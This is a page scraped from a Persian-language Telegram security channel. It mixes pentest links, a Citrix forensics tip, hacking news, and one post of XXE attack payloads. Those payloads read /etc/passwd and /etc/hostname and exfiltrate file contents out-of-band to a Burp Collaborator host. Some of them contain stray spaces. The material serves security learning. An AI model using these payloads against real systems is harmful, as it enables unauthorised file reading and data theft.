امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
امنیت اطلاعات
ابزار اسکن برای آسیب پذیری citrix CVE-2019-19781 https://github.com/trustedsec/cve-2019-19781/ #citrix #pentest @sec_nerd
#citrix #shitrix CVE-2019-19781 #DFIR tip:
Check all paths that have aliases in /etc/httpd.conf where web shells can be executed. Outside of /netscaler/ , .php backdoors will work in:

/var/ns_gui/{n_top,shared,support}
/var/vpn/theme/


@sec_nerd
چک لیست بالابردن سطح دسترسی در ویندوز و لینوکس

https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist


#privesc
#windows
#linux


@sec_nerd
برخی روش های استفاده از آسیب پذیری XXE

XXE via File Upload

<!DOCTYPE test [ <!E NTITY xxe SYSTEM "file:/// etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="https://w3.org/2000/svg" ....version="1.1">
<text font-size="40" x="0" y="16"> &xxe;



XXE Attacks via Modified Content Type

POST /hackingman HTTP/1.0
Content-Type: text/html
Content-Length: 7
<?xml version="1.0" encoding="UTF-8"><cicada>3301</cicada>



Exploiting Blind XXE to Exfiltrate Data Out-of-Band

<!ENTI TY % file SYSTEM "f ile:/ //etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfi ltrate SYSTEM 'https://im81nr4zhac2lafxnm997qwk6bc20r.burpcollaborator.net/?x=%file;'>">
%ev al;
%exfiltrate;



Exploiting blind XXE to retrieve data via error messages

<!EN ITY % file SYSTEM "fil e:///etc/pa sswd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///none xistent/%file;'>">
%eval;
%error;




#xxe


@sec_nerd
پنجاه مسیر و فایلی که در اسکن های ۲۴ ساعت گذشته توسط اسکنرها بررسی شده اند

اغلب این درخواستها به citrix مرتبط هستند



#citrix
#pentest


@sec_nerd
باج افزار جدیدی با نام BitPyLock قبل از رمزنگاری اطلاعات، آنها را میدزدد و تهدید به انتشار داده ها میکند.
این باج افزار در نسخه های جدید خود برای رمزگشایی از تمام شبکه ی آلوده ۵ بیت کوین درخواست می نماید.


اطلاعات بیشتر:
https://www.bleepingcomputer.com/news/security/bitpylock-ransomware-now-threatens-to-publish-stolen-data/


#ransomware
#news

@sec_nerd
محمدبن سلمان، شاهزاده ی سعودی متهم به هک کردن گوشی مالک آمازون Jeff Bezos !

بنابر گزارش گاردین بن سلمان پس از سفرهای متوالی به امریکا و ارتباط با بخش تکنولوژی این کشور و برقراری رابطه های نزدیک با مالکان شرکت های بزرگ، با جلب اعتماد آنها اقدام به آلوده کردن گوشی Jeff Bezos کرده است!
طبق این گزارش بن سلمان فایل ویدیویی را در واتس اپ برای جف ارسال کرده است که منشاء اصلی آلوده شدن و استخراج اطلاعات شخصی از تلفن همراه او بوده.
سعودی ها که در مسئله قتل جمال خاشقچی متهم اصلی ماجرا هستند اکنون متهم به هک کردن گوشی مالک آمازون شده اند.
طبق تحقیقات تیم امنیتی آمازون، عملیات هک گوشی جف دقیقا بعد از ارسال یک فایل از سوی محمدبن سلمان برای جف آغاز شده و برخی کارشناسان سعودی معتقدند جف به این دلیل هدف قرار گرفته است که وی مالک واشنگتن پست است و این روزنامه تمرکز زیادی بر روی قتل جمال خاشقچی دارد (جمال خبرنگار واشنگتن پست بود) و این مسئله باعث ایجاد اختلال در فعالیت های بن سلمان در نظام پادشاهی سعودی شده است.
هرچند سفارت سعودی در امریکا این اتهامات را چرند خوانده است اما تحقیقات تیم امنیتی آمازون بر روی این مسئله ادامه دارد.


https://www.theguardian.com/technology/2020/jan/21/amazon-boss-jeff-bezoss-phone-hacked-by-saudi-crown-prince


نکته: تصور کنید که گوشی مالک آمازون هک شده، فکر میکنید مسئولان و سیاستمداران کشور ما چقدر در امان هستند از این حملات؟ در مذاکرات و جلسات مختلف چقدر مسئولان ما دقت میکنن به اهمیت این موضوع؟ ممکنه عده ای بگن که مسئولان ما خیلی حواسشون هست و در هیچ جلسه ای حتی گوشی هم نمیبرن اما پیشنهاد میکنم کتاب «بدون هراس» وندی شرمن رو بخونید تا ببینید چقدر اینها مراقبن!!



#news
#ksa
#usa
#amazon
#scandal



@sec_nerd